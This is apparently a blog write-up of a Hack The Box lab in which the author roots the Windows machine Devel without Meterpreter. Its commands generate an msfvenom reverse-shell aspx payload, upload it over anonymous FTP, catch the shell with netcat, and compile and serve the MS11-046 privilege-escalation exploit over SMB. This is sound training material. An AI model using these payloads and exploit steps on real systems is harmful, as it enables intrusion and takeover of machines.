Heath Adams challenged his students to become root on HTB Devel without using Meterpreter1. I accepted that challenge and succeeded! This is the report of how I did it.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Devel’s IPv4 address. Here we can also see that this is a Windows machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
The scan shows that the machine has two open ports:
- FTP (21): We notice that anonymous FTP login is allowed. This tells us that we can upload files to the web server. Moreover, we can see some files here as well. It seems like it is a web root directory.
- HTTP (80): We learn that the http-server-header is
Microsoft IIS/7.5. If this were a pentest, this would be a finding as this is information disclosure. Moreover, we also get to know that the http-title is
IIS7. This indicates that we are dealing with a default web-page.
The first thing we do for this enumeration is visiting the website 10.10.10.5.
As our scan suggested, we are dealing with a default web-page. A default web-page indicates poor hygiene. What else did the website developer mess up? We look for extra directories by doing directory busting with DirBuster.
DirBuster does not return anything interesting. The next step is to understand if we can execute files uploaded via FTP on the target. In order to do this, we first create a text file called
test.txt on our Kali machine in which we write “test FTP”. Then, we connect to the target via FTP and upload this file. Now we navigate to
10.10.10.5/test.txt in the web-browser. Wow! We can see “test FTP” being displayed. This means that the server read our file and executed it.
Exploit Devel with a Windows payload
In this section, our goal is to get a reverse shell through FTP. Firstly, we will create a Windows payload with Msfvenom2 and save it into an aspx file. Then we will upload this file to the Devel machine via FTP and, after having set up a listener with Netcat, execute it.
We save the Msfvenom payload list into venom-payloads.txt and grep this file for
There are two payloads that are interesting for us:
windows/shell_reverse_tcp. The first is a staged payload, whereas the second is a non-staged payload. The difference between the two is well-explained in this table:
The staged payload did not get me in. For this reason, I will show you how to get a reverse shell by using the non-staged payload.
We create the payload and save it into
msfvenom -p windows/shell_reverse_tcp LHOST=<Your IPv4 address> LPORT=4444 -f aspx > ex_shell_ns.aspx
We then load this file to the Devel Machine via FTP:
anonymous(This is the username)
anonymous(This is the password)
binary(Set the transfer type: Binary instead of ASCII)
We also open a new terminal tab and set up a listener with Netcat, where
-n stands for numeric-only IP addresses,
-v for verbose,
-l for listen mode for inbound connects, and
-p for local port number (in this case, port 4444):
nc -nvlp 4444
Finally, we open
10.10.10.5/ex_shell_ns.aspx in our browser and we get a shell!
Unfortunately, we are not root on this machine yet.
Post-exploit enumeration and Windows privilege-escalation
In this section, our goal is to become root on the target machine. This action is called privilege-escalation, as we have a non-root shell already. Before running this attack, we need to do post-exploit enumeration in order to find a working exploit for this specific machine.
First, we get some information on the target machine.
This is a Windows 7 machine (version 6.1.7600) with x86 architecture. Let’s google “windows 7 (6.1 build 7600) exploit”. Among the results, this exploit is the most interesting: “An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges).” The only prerequisite is “low privilege access to the target OS”. No problem, we have this already. Let’s go ahead and use it.
We download the C source code to our Kali machine and save it as
MS11-046.c and compile it as a 32-bit payload with mingw4:
i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
Now we have to make
MS11-046.exe accessible on the target machine. To do this, we launch an smbserver with Python on Kali:
cp /usr/share/windows-resources/binaries/nc.exe smb/
mv MS11-046.exe smb/
smbserver.py share smb
Now we go back to our shell on the target and run
We are now the root user on the machine Devel! Now you just have to find the two flags for users
babis. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!